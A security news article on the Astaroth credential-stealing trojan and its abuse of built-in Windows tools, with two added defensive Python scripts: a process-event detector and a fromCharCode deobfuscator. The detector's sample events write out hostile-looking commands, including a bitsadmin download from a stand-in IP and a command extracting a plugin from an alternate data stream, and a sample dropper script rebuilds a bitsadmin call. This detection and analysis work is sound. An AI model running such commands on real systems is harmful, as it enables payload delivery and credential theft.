Windows 10 Users Beware! Astaroth Malware Campaign is Back and More Malicious!


Astaroth, an information-stealing Trojan known for abusing legitimate, built-in Microsoft Windows tools to carry out its attacks, has re-emerged stronger and stealthier than before.

Microsoft had previously detected these methods and publicly documented the malware's "living-off-the-land" tactics, but Astaroth has resurfaced with a spike in activity and refined techniques.

In the earlier campaign the built-in tool being abused was the Windows Management Instrumentation Command-line (WMIC), as spotted by Microsoft Defender ATP.

Microsoft's analysis at the time uncovered a spam operation that sent emails linking to websites hosting a ".LNK" shortcut file; the shortcut instructed WMIC and other Windows tools to run "fileless" malware entirely in memory, out of the reach of file-based anti-malware scanning.

Having learnt from that exposure, Astaroth now avoids WMIC entirely. Activity rose noticeably in January and February.

The new campaign still begins with a spam email linking to a malicious website that hosts an LNK file, but this version uses Alternate Data Streams (ADS), an NTFS feature that lets an attacker attach additional data to a file that already exists, which makes hiding malicious payloads easier.

The campaign's first step is a spam email that reads, "Please find in the link below the STATEMENT #56704/2019 AND LEGAL DECISION, for due purposes". The link points to an archive file named "Arquivo_PDF_.zip".

It abuses ExtExport.exe, a legitimate Windows (Internet Explorer) binary, to load the payload; researchers describe this as a highly unusual loading mechanism.

Once the victim opens the LNK file contained in the .zip, the malware runs an obfuscated BAT command line, which drops a JavaScript file into the user's "Pictures" folder and invokes explorer.exe to run it.

Because the data in an alternate stream is not shown in File Explorer, ADS make a convenient hiding place: in this version Astaroth reads and decrypts its plugins from ADS attached to a desktop.ini file. Those plugins let Astaroth steal email and browser passwords, and it also disables security software.

The plugins are the "NirSoft WebBrowserPassView" tool, used to recover passwords stored by browsers, and the "NirSoft MailPassView" tool, used to recover email client passwords.

This is not the only legitimate tool Astaroth abuses. BITSAdmin, a command-line tool that lets administrators create download and upload jobs and track their progress, is abused to download encrypted payloads.
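The chain above (explorer.exe launching a dropped script from Pictures, BITSAdmin pulling payloads, ExtExport.exe loading them, plugins read from an ADS on desktop.ini) leaves a recognisable trail in process-creation telemetry. The script below is an added example of detection logic over such events; it is not Microsoft's detection content or real Astaroth telemetry. The event field names, the rule thresholds, the user-folder list (the page only names Pictures; the others generalise the rule) and every sample event, including the 192.0.2.10 address and the stream name "plugin1", are constructed for illustration. It also carries a rule for the earlier WMIC "/format:" XSL technique so the older campaign is covered by the same pass.

```python
"""Detection logic for the living-off-the-land chain described above.

Added example: rules, field names and sample events are constructed for
illustration; they are not Microsoft's detections or real Astaroth telemetry.
"""
import ntpath
import re

# Binaries the chain uses to launch the dropped script (explorer.exe is what the
# BAT stage invokes; wscript/cscript are what actually run a .js file).
SCRIPT_LAUNCHERS = {"explorer.exe", "wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf")
# User-writable locations a dropped script is likely to sit in.  The page only
# names Pictures; the rest are an assumption that generalises the rule.
USER_DIRS = ("\\pictures\\", "\\downloads\\", "\\public\\libraries\\",
             "\\appdata\\", "\\temp\\")
# A path component with an extension followed by ":name" is NTFS ADS syntax,
# e.g. desktop.ini:plugin1.  A drive letter (C:\) is never preceded by a path
# separator, so it does not match.
ADS_RE = re.compile(r'[\\/][^\\/:\s"]+\.[A-Za-z0-9]+:[^\\/:\s"]+')


def _tokens(cmdline):
    """Split a Windows command line into quoted and bare tokens."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def _script_in_user_dir(cmdline):
    for tok in _tokens(cmdline):
        low = tok.lower()
        if low.endswith(SCRIPT_EXTS) and any(d in low for d in USER_DIRS):
            return tok
    return None


def check_event(ev):
    """Return a list of (rule, detail) tuples for one process-creation event."""
    image = ntpath.basename(ev["image"]).lower()
    parent = ntpath.basename(ev.get("parent_image", "")).lower()
    cmd = ev.get("command_line", "")
    low = cmd.lower()
    hits = []
    if image in SCRIPT_LAUNCHERS:
        script = _script_in_user_dir(cmd)
        if script:
            hits.append(("script_from_user_dir", f"{image} (parent {parent}) ran {script}"))
    if image == "bitsadmin.exe" and ("/transfer" in low or "/addfile" in low) and "http" in low:
        hits.append(("bitsadmin_download", cmd))
    if image == "extexport.exe":
        hits.append(("extexport_execution", f"parent {parent}: {cmd}"))
    if image == "wmic.exe" and "/format:" in low:   # the earlier WMIC/XSL variant
        hits.append(("wmic_xsl_format", cmd))
    m = ADS_RE.search(cmd)
    if m:
        hits.append(("ads_reference", m.group(0)))
    return hits


def detect(events):
    """Run every rule over a sequence of events; returns a flat list of findings."""
    findings = []
    for i, ev in enumerate(events):
        for rule, detail in check_event(ev):
            findings.append({"event": i, "rule": rule, "detail": detail})
    return findings


# Constructed sample telemetry mirroring the chain on the page, plus two benign rows.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'"C:\Windows\explorer.exe" "C:\Users\alice\Pictures\v2xs.js"'},
    {"image": r"C:\Windows\System32\wscript.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Pictures\v2xs.js"'},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"bitsadmin /transfer upd /download /priority foreground "
                     r"http://192.0.2.10/r1.bin C:\Users\Public\Libraries\r1.bin"},
    {"image": r"C:\Program Files\Internet Explorer\ExtExport.exe", "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'"C:\Program Files\Internet Explorer\ExtExport.exe" C:\Users\Public\Libraries\raw'},
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"cmd.exe /c type C:\Users\Public\Libraries\raw\desktop.ini:plugin1 "
                     r"> C:\Users\Public\Libraries\raw\p1.bin"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\Pictures\notes.txt'},
    {"image": r"C:\Windows\explorer.exe", "parent_image": r"C:\Windows\System32\userinit.exe",
     "command_line": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"event {f['event']}: {f['rule']}: {f['detail']}")
```

Each rule on its own is noisy (administrators do run bitsadmin), so in practice these findings are best correlated by process tree: a script host whose ancestor is explorer.exe launched from cmd.exe, followed within minutes by bitsadmin and ExtExport.exe under the same user session, is far stronger than any single hit.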

Reportedly, Astaroth has previously wreaked havoc across Asia, North America and Europe.

Astaroth: The Trojan That Abuses Anti-Virus Software To Steal Data

A new Astaroth variant has surfaced that disguises itself as GIF and other image files and abuses anti-virus software to harvest data from the user's PC.

A security research team reported that this variant makes use of modules belonging to the security software itself.

Abusing those modules lets the attacker get hold of the victim's data, including online credentials.

Disguised as extension-less files, the Trojan tries to move around the victim's PC undetected.

Spam emails and phishing messages lure the victim into downloading the malicious file; the legitimate Microsoft Windows BITSAdmin tool is then used to download the full payload from a command-and-control (C2) server.

The malware then launches an XSL script and establishes a channel to the C2 server. The script is obfuscated and contains functions to hide itself from anti-virus software.

The same script drives BITSAdmin to download further payloads, including Astaroth itself, from a different C2 server.

Older versions of this Trojan scanned for anti-virus programs and simply quit if "Avast" was present.

In the current Astaroth variant the anti-virus software is instead abused: a malicious module is injected into one of its processes.

This abuse of legitimate, pre-installed binaries is known as LOLbins (Living Off the Land binaries). GAS, an anti-fraud security program, can be abused in the same way.

The Trojan first surfaced in 2017 in South America. It collects machine information, passwords and other data; it is also capable of keylogging, can intercept calls, and can terminate processes.

The malware uses a "fromCharCode() deobfuscation" routine to conceal the code it executes, an upgrade over older versions of Astaroth.
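Script obfuscated this way spells its strings out as lists of character codes passed to String.fromCharCode(), so an analyst's first step is to fold those calls back into literals. The following is an added example of that step, not code from the page or from any Astaroth sample: the regexes, the handling of decimal and 0x-hex literals, the concatenation folding and the sample script (a WSH-style dropper snippet written for this example) are all constructed here.

```python
"""Undo the String.fromCharCode() obfuscation mentioned above.

Added example, not code from the page or from any Astaroth sample: the regexes
and the sample script are constructed for illustration.
"""
import json
import re

# String.fromCharCode(87, 83, ...) or String["fromCharCode"](0x57, ...) with a
# plain list of numeric literals.  Calls whose arguments are expressions rather
# than literals are left untouched.
_CALL = re.compile(
    r'String(?:\.fromCharCode|\[\s*["\']fromCharCode["\']\s*\])'
    r'\s*\(\s*([0-9xXa-fA-F\s,]+?)\s*\)')
# "abc" + "def" -> "abcdef" (double-quoted literals only; a regex pass, not a parser).
_CONCAT = re.compile(r'"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"')
_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')


def _decode_args(arg_text):
    """Turn '87,83,0x63' into the string those code points spell."""
    out = []
    for lit in arg_text.split(","):
        lit = lit.strip()
        if not lit:
            continue
        value = int(lit, 16) if lit.lower().startswith("0x") else int(lit, 10)
        out.append(chr(value))
    return "".join(out)


def _replace_call(m):
    try:
        return json.dumps(_decode_args(m.group(1)))  # emit a JS string literal
    except ValueError:
        return m.group(0)  # not a literal list after all; leave the call alone


def deobfuscate(js):
    """Replace fromCharCode calls with literals and fold adjacent concatenations."""
    prev = None
    while prev != js:  # repeat until a pass changes nothing (chained + operators)
        prev = js
        js = _CALL.sub(_replace_call, js)
        js = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
    return js


def string_literals(js):
    """Double-quoted string literals in (deobfuscated) script text, for IOC review."""
    return _STRING.findall(js)


# Constructed sample in the style of a WSH dropper; not an Astaroth artefact.
SAMPLE_JS = (
    'var sh = new ActiveXObject(String.fromCharCode(87,83,99,114,105,112,116,46,83,104,101,108,108)); '
    'sh.Run(String["fromCharCode"](0x62,0x69,0x74,0x73) + String.fromCharCode(97,100,109,105,110) '
    '+ " /transfer j");'
)

if __name__ == "__main__":
    cleaned = deobfuscate(SAMPLE_JS)
    print(cleaned)
    print(string_literals(cleaned))
```

On the sample this recovers "WScript.Shell" and "bitsadmin /transfer j", which is exactly the kind of string a detection rule or a YARA signature can key on once the character-code layer is gone. Real samples stack further layers (array lookups, computed arguments, eval of the result), so treat this as the first pass, and run it on a copy of the script in an isolated analysis VM, never on the endpoint.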

LOLbins have considerable malicious potential, including the theft of credentials and personal data. The technique is highly attractive to attackers, and defenders need to prepare for it.